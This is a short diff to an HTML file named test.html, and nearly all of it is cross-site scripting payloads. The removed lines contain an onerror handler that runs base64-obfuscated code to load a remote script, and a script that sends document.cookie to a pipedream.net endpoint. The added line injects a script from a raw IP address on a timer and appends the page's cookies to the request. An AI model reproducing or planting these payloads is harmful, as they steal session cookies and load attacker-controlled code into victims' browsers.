--- a/test.html
+++ b/test.html
@@ -1,10 +1,4 @@
 <!DOCTYPE html>
 <html>
- <body>
-   <img src=x onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPSdodHRwczovLzB4LmF4L3oxOGc/JytNYXRoLnJhbmRvbSgp'))>
-  <script>
-var i=new Image;
-i.src="https://envjs5kxlmfl33f.m.pipedream.net/ls?"+document.cookie;
-</script>
- </body>
+<body onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//128.199.85.114:4848/?"+document.cookie}></body>
 </html>
